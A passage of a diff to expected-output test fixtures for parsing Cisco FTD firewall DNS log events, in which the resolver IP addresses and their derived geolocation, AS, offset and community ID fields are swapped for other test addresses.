- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
- "destination.ip": "8.8.8.8",
+ "destination.geo.city_name": "Changchun",
+ "destination.geo.continent_name": "Asia",
+ "destination.geo.country_iso_code": "CN",
+ "destination.geo.country_name": "China",
+ "destination.geo.location.lat": 43.88,
+ "destination.geo.location.lon": 125.3228,
+ "destination.geo.region_iso_code": "CN-22",
+ "destination.geo.region_name": "Jilin Sheng",
+ "destination.ip": "175.16.199.1",
 "destination.packets": 1,
 "destination.port": 53,
 "dns.question.name": "elastic.co",
@@ -947,7 +956,7 @@
 "event.end": "2019-08-26T21:11:03.000-02:00",
 "event.kind": "event",
 "event.module": "cisco",
- "event.original": "%FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 47260, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSResponseType: Server Failure, DNSRecordType: marks the start of a zone of authority, DNS_TTL: 899",
+ "event.original": "%FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 175.16.199.1, SrcPort: 47260, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSResponseType: Server Failure, DNSRecordType: marks the start of a zone of authority, DNS_TTL: 899",
 "event.outcome": "success",
 "event.severity": 1,
 "event.start": "2019-08-26T23:11:03.000Z",
@@ -961,9 +970,9 @@
 "host.hostname": "siem-ftd",
 "input.type": "log",
 "log.level": "alert",
- "log.offset": 5553,
+ "log.offset": 5593,
 "network.application": "dns client",
- "network.community_id": "1:0YJqKZXX7VN9W1Gx6txd8TFELHM=",
+ "network.community_id": "1:t64M0Z/m2pBWy+a226Z/H+Vnrjc=",
 "network.iana_number": 17,
 "network.protocol": "dns",
 "network.transport": "udp",
@@ -980,7 +989,7 @@
 ],
 "related.ip": [
 "10.0.1.20",
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "related.user": [
 "No Authentication Required"
@@ -1016,7 +1025,7 @@
 "cisco.ftd.security.dns_query": "elastic.co",
 "cisco.ftd.security.dns_record_type": "text strings",
 "cisco.ftd.security.dns_ttl": "299",
- "cisco.ftd.security.dst_ip": "8.8.8.8",
+ "cisco.ftd.security.dst_ip": "175.16.199.1",
 "cisco.ftd.security.dst_port": "53",
 "cisco.ftd.security.egress_interface": "outside",
 "cisco.ftd.security.egress_zone": "output-zone",
@@ -1034,16 +1043,17 @@
 "cisco.ftd.security.src_port": "58082",
 "cisco.ftd.security.user": "No Authentication Required",
 "cisco.ftd.source_interface": "inside",
- "destination.address": "8.8.8.8",
- "destination.as.number": 15169,
- "destination.as.organization.name": "Google LLC",
+ "destination.address": "175.16.199.1",
 "destination.bytes": 722,
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
- "destination.ip": "8.8.8.8",
+ "destination.geo.city_name": "Changchun",
+ "destination.geo.continent_name": "Asia",
+ "destination.geo.country_iso_code": "CN",
+ "destination.geo.country_name": "China",
+ "destination.geo.location.lat": 43.88,
+ "destination.geo.location.lon": 125.3228,
+ "destination.geo.region_iso_code": "CN-22",
+ "destination.geo.region_name": "Jilin Sheng",
+ "destination.ip": "175.16.199.1",
 "destination.packets": 1,
 "destination.port": 53,
 "dns.question.name": "elastic.co",
@@ -1059,7 +1069,7 @@ "event.end": "2019-08-26T21:11:03.000-02:00", "event.kind": "event", "event.module": "cisco", - "event.original": "%FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 58082, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 722, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: text strings, DNS_TTL: 299", + "event.original": "%FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 175.16.199.1, SrcPort: 58082, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 722, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: text strings, DNS_TTL: 299", "event.outcome": "success", "event.severity": 1, "event.start": "2019-08-26T23:11:03.000Z", 
@@ -1073,9 +1083,9 @@ "host.hostname": "siem-ftd", "input.type": "log", "log.level": "alert", - "log.offset": 6269, + "log.offset": 6314, "network.application": "dns client", - "network.community_id": "1:jVTdIEwjG0Eb77jGrcDygrNq9jg=", + "network.community_id": "1:7tN8tGLiJNoFT89lpvR+QyNOZBM=", "network.iana_number": 17, "network.protocol": "dns", "network.transport": "udp", @@ -1092,7 +1102,7 @@ ], "related.ip": [ "10.0.1.20", - "8.8.8.8" + "175.16.199.1" ], "related.user": [ "No Authentication Required" @@ -1145,17 +1155,7 @@ "cisco.ftd.security.user": "No Authentication Required", "cisco.ftd.source_interface": "inside", "destination.address": "205.251.196.144", - "destination.as.number": 16509, - "destination.as.organization.name": "Amazon.com, Inc.", "destination.bytes": 75, - "destination.geo.city_name": "Seattle", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 47.6109, - "destination.geo.location.lon": -122.3303, - "destination.geo.region_iso_code": "US-WA", - "destination.geo.region_name": "Washington", "destination.ip": "205.251.196.144", "destination.packets": 1, "destination.port": 53, @@ -1186,7 +1186,7 @@ "host.hostname": "siem-ftd", "input.type": "log", "log.level": "alert", - "log.offset": 6983, + "log.offset": 7033, "network.application": "dns client", "network.community_id": "1:ZllIE5YNb+12oKtX/tP/gysnSuE=", "network.iana_number": 17, @@ -1238,7 +1238,7 @@ "cisco.ftd.security.client": "DNS client", "cisco.ftd.security.connection_duration": "0", "cisco.ftd.security.dns_response_type": "Server Failure", - "cisco.ftd.security.dst_ip": "8.8.8.8", + "cisco.ftd.security.dst_ip": "175.16.199.1", "cisco.ftd.security.dst_port": "53", "cisco.ftd.security.egress_interface": "outside", "cisco.ftd.security.egress_zone": "output-zone", 
@@ -1255,16 +1255,17 @@ "cisco.ftd.security.src_port": "39541", "cisco.ftd.security.user": "No Authentication Required", "cisco.ftd.source_interface": "inside", - "destination.address": "8.8.8.8", - "destination.as.number": 15169, - "destination.as.organization.name": "Google LLC", + "destination.address": "175.16.199.1", "destination.bytes": 313, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, - "destination.ip": "8.8.8.8", + "destination.geo.city_name": "Changchun", + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "CN", + "destination.geo.country_name": "China", + "destination.geo.location.lat": 43.88, + "destination.geo.location.lon": 125.3228, + "destination.geo.region_iso_code": "CN-22", + "destination.geo.region_name": "Jilin Sheng", + "destination.ip": "175.16.199.1", "destination.packets": 4, "destination.port": 53, "dns.response_code": "SERVFAIL", 
@@ -1278,7 +1279,7 @@ "event.end": "2019-08-26T21:11:03.000-02:00", "event.kind": "event", "event.module": "cisco", - "event.original": "%FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 39541, DstPort: 53, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 6, ResponderPackets: 4, InitiatorBytes: 457, ResponderBytes: 313, NAPPolicy: Balanced Security and Connectivity, DNSResponseType: Server Failure", + "event.original": "%FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 175.16.199.1, SrcPort: 39541, DstPort: 53, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 6, ResponderPackets: 4, InitiatorBytes: 457, ResponderBytes: 313, NAPPolicy: Balanced Security and Connectivity, DNSResponseType: Server Failure", "event.outcome": "success", "event.severity": 1, "event.start": "2019-08-26T23:11:03.000Z", @@ -1292,9 +1293,9 @@ "host.hostname": "siem-ftd", "input.type": "log", "log.level": "alert", - "log.offset": 7672, + "log.offset": 7722, "network.application": "dns client", - "network.community_id": "1:oGBN4YWsAncmtqDJ1onnQNRAEnw=", + "network.community_id": "1:G30mjgNJHAAxjeZIH5X2K011CII=", "network.iana_number": 6, "network.protocol": "dns", "network.transport": "tcp", @@ -1311,7 +1312,7 @@ ], "related.ip": [ "10.0.1.20", - "8.8.8.8" + "175.16.199.1" ], "related.user": [ "No Authentication Required" 
@@ -1347,7 +1348,7 @@ "cisco.ftd.security.dns_record_type": "a host address", "cisco.ftd.security.dns_response_type": "Non-Existent Domain", "cisco.ftd.security.dns_ttl": "900", - "cisco.ftd.security.dst_ip": "9.9.9.9", + "cisco.ftd.security.dst_ip": "1.128.3.4", "cisco.ftd.security.dst_port": "53", "cisco.ftd.security.egress_interface": "outside", "cisco.ftd.security.egress_zone": "output-zone", @@ -1364,16 +1365,11 @@ "cisco.ftd.security.src_port": "41672", "cisco.ftd.security.user": "No Authentication Required", "cisco.ftd.source_interface": "inside", - "destination.address": "9.9.9.9", - "destination.as.number": 19281, - "destination.as.organization.name": "Quad9", + "destination.address": "1.128.3.4", + "destination.as.number": 1221, + "destination.as.organization.name": "Telstra Pty Ltd", "destination.bytes": 180, - "destination.geo.continent_name": "Europe", - "destination.geo.country_iso_code": "FR", - "destination.geo.country_name": "France", - "destination.geo.location.lat": 48.8582, - "destination.geo.location.lon": 2.3387, - "destination.ip": "9.9.9.9", + "destination.ip": "1.128.3.4", "destination.packets": 1, "destination.port": 53, "dns.question.name": "laskdfjlaksdf.elastic.co", 
@@ -1389,7 +1385,7 @@ "event.end": "2019-08-26T21:11:03.000-02:00", "event.kind": "event", "event.module": "cisco", - "event.original": "%FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 9.9.9.9, SrcPort: 41672, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 107, ResponderBytes: 180, NAPPolicy: Balanced Security and Connectivity, DNSQuery: laskdfjlaksdf.elastic.co, DNSRecordType: a host address, DNSResponseType: Non-Existent Domain, DNS_TTL: 900", + "event.original": "%FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 1.128.3.4, SrcPort: 41672, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 107, ResponderBytes: 180, NAPPolicy: Balanced Security and Connectivity, DNSQuery: laskdfjlaksdf.elastic.co, DNSRecordType: a host address, DNSResponseType: Non-Existent Domain, DNS_TTL: 900", "event.outcome": "success", "event.severity": 1, "event.start": "2019-08-26T23:11:03.000Z", @@ -1403,9 +1399,9 @@ "host.hostname": "siem-ftd", "input.type": "log", "log.level": "alert", - "log.offset": 8298, + "log.offset": 8353, "network.application": "dns client", - "network.community_id": "1:+1CCqUYePM8bXFUXWVeSSjL3g58=", + "network.community_id": "1:iApagbBNHbGxbhy6gmkfzWZgbk0=", "network.iana_number": 17, "network.protocol": "dns", "network.transport": "udp", 
@@ -1421,8 +1417,8 @@ "siem-ftd" ], "related.ip": [ - "10.0.1.20", - "9.9.9.9" + "1.128.3.4", + "10.0.1.20" ], "related.user": [ "No Authentication Required" @@ -1457,7 +1453,7 @@ "cisco.ftd.security.dns_query": "ns-1168.awsdns-18.org", "cisco.ftd.security.dns_record_type": "a host address", "cisco.ftd.security.dns_ttl": "31694", - "cisco.ftd.security.dst_ip": "9.9.9.9", + "cisco.ftd.security.dst_ip": "1.128.3.4", "cisco.ftd.security.dst_port": "53", "cisco.ftd.security.egress_interface": "outside", "cisco.ftd.security.egress_zone": "output-zone", @@ -1474,16 +1470,11 @@ "cisco.ftd.security.src_port": "59577", "cisco.ftd.security.user": "No Authentication Required", "cisco.ftd.source_interface": "inside", - "destination.address": "9.9.9.9", - "destination.as.number": 19281, - "destination.as.organization.name": "Quad9", + "destination.address": "1.128.3.4", + "destination.as.number": 1221, + "destination.as.organization.name": "Telstra Pty Ltd", "destination.bytes": 108, - "destination.geo.continent_name": "Europe", - "destination.geo.country_iso_code": "FR", - "destination.geo.country_name": "France", - "destination.geo.location.lat": 48.8582, - "destination.geo.location.lon": 2.3387, - "destination.ip": "9.9.9.9", + "destination.ip": "1.128.3.4", "destination.packets": 1, "destination.port": 53, "dns.question.name": "ns-1168.awsdns-18.org", 
@@ -1499,7 +1490,7 @@ "event.end": "2019-08-26T21:11:03.000-02:00", "event.kind": "event", "event.module": "cisco", - "event.original": "%FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 9.9.9.9, SrcPort: 59577, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 104, ResponderBytes: 108, NAPPolicy: Balanced Security and Connectivity, DNSQuery: ns-1168.awsdns-18.org, DNSRecordType: a host address, DNS_TTL: 31694", + "event.original": "%FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 1.128.3.4, SrcPort: 59577, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 104, ResponderBytes: 108, NAPPolicy: Balanced Security and Connectivity, DNSQuery: ns-1168.awsdns-18.org, DNSRecordType: a host address, DNS_TTL: 31694", "event.outcome": "success", "event.severity": 1, "event.start": "2019-08-26T23:11:03.000Z", @@ -1513,9 +1504,9 @@ "host.hostname": "siem-ftd", "input.type": "log", "log.level": "alert", - "log.offset": 9010, + "log.offset": 9067, "network.application": "dns client", - "network.community_id": "1:f5P/ntfU9KchCtCfWHT0mYDOHOw=", + "network.community_id": "1:6V/s46Po6wnn5ES7o/vBqmwKUOA=", "network.iana_number": 17, "network.protocol": "dns", "network.transport": "udp", 
@@ -1531,8 +1522,8 @@ "siem-ftd" ], "related.ip": [ - "10.0.1.20", - "9.9.9.9" + "1.128.3.4", + "10.0.1.20" ], "related.user": [ "No Authentication Required" @@ -1568,7 +1559,7 @@ "cisco.ftd.security.dns_record_type": "Server Selection", "cisco.ftd.security.dns_response_type": "Non-Existent Domain", "cisco.ftd.security.dns_ttl": "946", - "cisco.ftd.security.dst_ip": "9.9.9.9", + "cisco.ftd.security.dst_ip": "1.128.3.4", "cisco.ftd.security.dst_port": "53", "cisco.ftd.security.egress_interface": "outside", "cisco.ftd.security.egress_zone": "output-zone", @@ -1585,16 +1576,11 @@ "cisco.ftd.security.src_port": "35998", "cisco.ftd.security.user": "No Authentication Required", "cisco.ftd.source_interface": "inside", - "destination.address": "9.9.9.9", - "destination.as.number": 19281, - "destination.as.organization.name": "Quad9", + "destination.address": "1.128.3.4", + "destination.as.number": 1221, + "destination.as.organization.name": "Telstra Pty Ltd", "destination.bytes": 162, - "destination.geo.continent_name": "Europe", - "destination.geo.country_iso_code": "FR", - "destination.geo.country_name": "France", - "destination.geo.location.lat": 48.8582, - "destination.geo.location.lon": 2.3387, - "destination.ip": "9.9.9.9", + "destination.ip": "1.128.3.4", "destination.packets": 1, "destination.port": 53, "dns.question.name": "_http._tcp.security.ubuntu.com", 
@@ -1610,7 +1596,7 @@ "event.end": "2019-08-26T21:11:03.000-02:00", "event.kind": "event", "event.module": "cisco", - "event.original": "%FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 9.9.9.9, SrcPort: 35998, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 101, ResponderBytes: 162, NAPPolicy: Balanced Security and Connectivity, DNSQuery: _http._tcp.security.ubuntu.com, DNSRecordType: Server Selection, DNSResponseType: Non-Existent Domain, DNS_TTL: 946", + "event.original": "%FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 1.128.3.4, SrcPort: 35998, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 101, ResponderBytes: 162, NAPPolicy: Balanced Security and Connectivity, DNSQuery: _http._tcp.security.ubuntu.com, DNSRecordType: Server Selection, DNSResponseType: Non-Existent Domain, DNS_TTL: 946", "event.outcome": "success", "event.severity": 1, "event.start": "2019-08-26T23:11:03.000Z", 
@@ -1624,9 +1610,9 @@ "host.hostname": "siem-ftd", "input.type": "log", "log.level": "alert", - "log.offset": 9683, + "log.offset": 9742, "network.application": "dns client", - "network.community_id": "1:wrAm7MmrJHlBQ+ikcQmSwf2JnJM=", + "network.community_id": "1:F1VZPAzgUyhFzHXdZCyLebsB4JY=", "network.iana_number": 17, "network.protocol": "dns", "network.transport": "udp", @@ -1642,8 +1628,8 @@ "siem-ftd" ], "related.ip": [ - "10.0.1.20", - "9.9.9.9" + "1.128.3.4", + "10.0.1.20" ], "related.user": [ "No Authentication Required" @@ -1679,7 +1665,7 @@ "cisco.ftd.security.dns_query": "elastic.co", "cisco.ftd.security.dns_record_type": "mail exchange", "cisco.ftd.security.dns_ttl": "299", - "cisco.ftd.security.dst_ip": "8.8.8.8", + "cisco.ftd.security.dst_ip": "175.16.199.1", "cisco.ftd.security.dst_port": "53", "cisco.ftd.security.egress_interface": "outside", "cisco.ftd.security.egress_zone": "output-zone", 
@@ -1697,16 +1683,17 @@ "cisco.ftd.security.src_port": "55105", "cisco.ftd.security.user": "No Authentication Required", "cisco.ftd.source_interface": "inside", - "destination.address": "8.8.8.8", - "destination.as.number": 15169, - "destination.as.organization.name": "Google LLC", + "destination.address": "175.16.199.1", "destination.bytes": 199, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, - "destination.ip": "8.8.8.8", + "destination.geo.city_name": "Changchun", + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "CN", + "destination.geo.country_name": "China", + "destination.geo.location.lat": 43.88, + "destination.geo.location.lon": 125.3228, + "destination.geo.region_iso_code": "CN-22", + "destination.geo.region_name": "Jilin Sheng", + "destination.ip": "175.16.199.1", "destination.packets": 1, "destination.port": 53, "dns.question.name": "elastic.co", 
@@ -1722,7 +1709,7 @@ "event.end": "2019-08-26T21:11:03.000-02:00", "event.kind": "event", "event.module": "cisco", - "event.original": "%FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 55105, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 199, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: mail exchange, DNS_TTL: 299", + "event.original": "%FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 175.16.199.1, SrcPort: 55105, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 199, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: mail exchange, DNS_TTL: 299", "event.outcome": "success", "event.severity": 1, "event.start": "2019-08-26T23:11:03.000Z", 
@@ -1736,9 +1723,9 @@ "host.hostname": "siem-ftd", "input.type": "log", "log.level": "alert", - "log.offset": 10403, + "log.offset": 10464, "network.application": "dns client", - "network.community_id": "1:rjxS8IH4jqdHiflcG+1txqEFP1M=", + "network.community_id": "1:udDTvAepVn3p8B+5mKdI4G/Ijb0=", "network.iana_number": 17, "network.protocol": "dns", "network.transport": "udp", @@ -1755,7 +1742,7 @@ ], "related.ip": [ "10.0.1.20", - "8.8.8.8" + "175.16.199.1" ], "related.user": [ "No Authentication Required" @@ -1790,7 +1777,7 @@ "cisco.ftd.security.dns_query": "elastic.co", "cisco.ftd.security.dns_record_type": "marks the start of a zone of authority", "cisco.ftd.security.dns_ttl": "899", - "cisco.ftd.security.dst_ip": "8.8.8.8", + "cisco.ftd.security.dst_ip": "175.16.199.1", "cisco.ftd.security.dst_port": "53", "cisco.ftd.security.egress_interface": "outside", "cisco.ftd.security.egress_zone": "output-zone", 
@@ -1807,16 +1794,17 @@ "cisco.ftd.security.src_port": "47260", "cisco.ftd.security.user": "No Authentication Required", "cisco.ftd.source_interface": "inside", - "destination.address": "8.8.8.8", - "destination.as.number": 15169, - "destination.as.organization.name": "Google LLC", + "destination.address": "175.16.199.1", "destination.bytes": 166, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, - "destination.ip": "8.8.8.8", + "destination.geo.city_name": "Changchun", + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "CN", + "destination.geo.country_name": "China", + "destination.geo.location.lat": 43.88, + "destination.geo.location.lon": 125.3228, + "destination.geo.region_iso_code": "CN-22", + "destination.geo.region_name": "Jilin Sheng", + "destination.ip": "175.16.199.1", "destination.packets": 1, "destination.port": 53, "dns.question.name": "elastic.co", 
@@ -1832,7 +1820,7 @@ "event.end": "2019-08-26T21:11:03.000-02:00", "event.kind": "event", "event.module": "cisco", - "event.original": "%FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 47260, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: marks the start of a zone of authority, DNS_TTL: 899", + "event.original": "%FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 175.16.199.1, SrcPort: 47260, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: marks the start of a zone of authority, DNS_TTL: 899", "event.outcome": "success", "event.severity": 1, "event.start": "2019-08-26T23:11:03.000Z", @@ -1846,9 +1834,9 @@ "host.hostname": "siem-ftd", "input.type": "log", "log.level": "alert", - "log.offset": 11118, + "log.offset": 11184, "network.application": "dns client", - "network.community_id": "1:0YJqKZXX7VN9W1Gx6txd8TFELHM=", + "network.community_id": "1:t64M0Z/m2pBWy+a226Z/H+Vnrjc=", "network.iana_number": 17, "network.protocol": "dns", "network.transport": "udp", 
@@ -1865,7 +1853,7 @@ ], "related.ip": [ "10.0.1.20", - "8.8.8.8" + "175.16.199.1" ], "related.user": [ "No Authentication Required" @@ -1900,7 +1888,7 @@ "cisco.ftd.security.dns_query": "elastic.co", "cisco.ftd.security.dns_record_type": "the canonical name for an alias", "cisco.ftd.security.dns_ttl": "899", - "cisco.ftd.security.dst_ip": "8.8.8.8", + "cisco.ftd.security.dst_ip": "175.16.199.1", "cisco.ftd.security.dst_port": "53", "cisco.ftd.security.egress_interface": "outside", "cisco.ftd.security.egress_zone": "output-zone", @@ -1917,16 +1905,17 @@ "cisco.ftd.security.src_port": "53033", "cisco.ftd.security.user": "No Authentication Required", "cisco.ftd.source_interface": "inside", - "destination.address": "8.8.8.8", - "destination.as.number": 15169, - "destination.as.organization.name": "Google LLC", + "destination.address": "175.16.199.1", "destination.bytes": 166, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, - "destination.ip": "8.8.8.8", + "destination.geo.city_name": "Changchun", + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "CN", + "destination.geo.country_name": "China", + "destination.geo.location.lat": 43.88, + "destination.geo.location.lon": 125.3228, + "destination.geo.region_iso_code": "CN-22", + "destination.geo.region_name": "Jilin Sheng", + "destination.ip": "175.16.199.1", "destination.packets": 1, "destination.port": 53, "dns.question.name": "elastic.co", 
@@ -1942,7 +1931,7 @@ "event.end": "2019-08-26T21:11:03.000-02:00", "event.kind": "event", "event.module": "cisco", - "event.original": "%FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 53033, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: the canonical name for an alias, DNS_TTL: 899", + "event.original": "%FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 175.16.199.1, SrcPort: 53033, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, 